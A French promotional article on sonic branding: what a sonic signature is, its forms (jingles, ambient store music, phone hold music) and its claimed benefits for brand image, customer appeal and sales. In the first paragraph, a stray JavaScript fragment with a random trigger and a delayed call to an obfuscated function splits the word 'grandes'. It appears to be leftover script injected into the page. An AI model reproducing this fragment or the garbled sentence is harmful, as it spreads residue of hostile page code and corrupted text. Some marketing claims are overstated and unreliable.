Qu’est-ce qu’une signature sonore ?

Alors que le monde du commerce est saturé d’offres similaires, il est devenu indispensable pour chaque entreprise de se démarquer de ses concurrents. Afin de séduire de potentiels clients, d’augmenter leurs ventes et de gagner des parts de marché, les grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes et petites enseignes font aujourd’hui le choix judicieux d’investir dans le marketing sensoriel, notamment auditif. En effet, la création d’identité sonore est dorénavant un atout majeur à l’ère du numérique.

Une séquence musicale qui fait toute la différence

La signature sonore est un ensemble de sons, formant une composition musicale originale, attachée à une marque et à ses produits. Celle-ci s’inscrit désormais au cœur de la stratégie de communication de toutes les sociétés, au même titre que la charte graphique. De la sorte, elle se doit de refléter avec le plus d’exactitude possible leurs valeurs et de renvoyer une image favorable au public ciblé. La première impression des auditeurs est primordiale.


Selon les besoins et le projet des entreprises, l’identité sonore peut prendre diverses formes, à l’image d’une musique d’ambiance, d’attente téléphonique ou d’un jingle, aussi nommé logo sonore. Ainsi, qu’elle soit zen, entrainante, électronique ou jazzy, elle créera une atmosphère en accord avec le style des articles proposés et les goûts des clients fréquentant le point de vente. Le volume, doux ou plus élevé, devra également être ajusté selon le lieu, leurs attentes et leur profil.

séquence musicale signature sonore

Bref et clairement identifiable, le jingle passant à la radio ou à la fin d’une publicité audiovisuelle doit, quant à lui, être reconnu instantanément par le consommateur lors de la diffusion. Composé uniquement d’un air mélodique ou prononcé, voire chanté par une voix off, sa qualité tient à sa facilité de mémorisation. Une fois dans tous les esprits, il accompagnera les acheteurs dans leur quotidien et rendra les produits présentés inoubliables.

Insérée dans un message de répondeur ou d’attente téléphonique, cette séquence sonore permettra, en outre, à tous les interlocuteurs de prendre connaissance de l’identité de l’entreprise. Ce premier contact est un gage de sérieux et de professionnalisme.

Une affaire de professionnels

Au regard de son importance, la création d’identité sonore ne doit pas être laissée au hasard, mais confiée à des professionnels de la communication. Il est conseillé de faire appel à une agence spécialisée dans le domaine du marketing sensoriel afin d’adopter la stratégie de vente la plus efficace et profitable. Il est également possible de se faire accompagner par des indépendants.

agence marketing sensoriel

Quels avantages à retirer d’une signature auditive ?

Bien plus qu’un simple habillage de spots publicitaires, la signature sonore joue un rôle commercial essentiel. Elle symbolise la volonté d’une marque de communiquer sur ses activités et de se développer avec modernité et dynamisme. Voici les principales raisons de sauter le pas.

Elle renforce l’image d’une marque

Tout d’abord, elle confère une identité définie et immédiatement reconnaissable à une entreprise. Cette ritournelle de quelques notes consolide son image et semble raconter à chaque émission son histoire. En effet, alors que la consommation de musique sur tous les supports multimédias n’a jamais été aussi élevée en France et dans le monde, solliciter l’ouïe des prospects est un pari astucieux. Gagnant de la sorte en visibilité sur un marché très compétitif, sa notoriété s’en trouvera accrue.

Par ailleurs, l’identité sonore améliore l’opinion qu’ont les collaborateurs de leur enseigne et renforce même la cohésion parmi les employés. Ayant le sentiment d’appartenir à un groupe mieux défini, ils se montreront plus concernés et investis dans leur travail.

identité sonore image de marque

D’autre part, les messages publicitaires, prenant l’aspect de spots diffusés à la télévision, à la radio ou sous la forme de vidéos sur Internet auront un impact bénéfique sur le consommateur. Solliciter un sens supplémentaire, en associant la vue et l’ouïe, rend les individus plus attentifs, donc réceptifs au message transmis. Plus présente dans le paysage médiatique, la marque inspirera davantage confiance et deviendra progressivement incontournable.

Elle séduit la clientèle

En boutique, les morceaux ou les sons choisis participent tout autant que le décor à élaborer un environnement propice à la consommation. Une atmosphère agréable et personnalisée incitera à la fois les clients à franchir le seuil du magasin par curiosité et à rester plus longtemps. À l’abri de l’agitation d’une rue commerçante ou des allées bruyantes d’un centre commercial, ils apprécieront de trouver refuge dans un univers unique et engageant. Non seulement, la musique d’ambiance permet de prolonger leur expérience dans les rayons, mais elle peut aussi déclencher chez eux une impulsion d’achat. En effet, elle est reconnue pour ses vertus apaisantes ou stimulantes selon les genres. Il est prouvé qu’elle suscite des émotions et agit de manière bénéfique sur l’humeur. Grâce au fond sonore, les articles observés seront jugés plus attirants. L’acquisition d’un ou de plusieurs produits sera aussi considérée comme une action positive, source de bien-être et de plaisir. La représentation symbolique et inconsciente qu’aura une personne de la marque sera par conséquent améliorée.

Elle augmente les ventes

En accroissant le taux de fréquentation des points de vente et en attirant l’attention des acheteurs, la composition musicale possède un impact non négligeable sur les ventes. Elles seront multipliées de manière significative.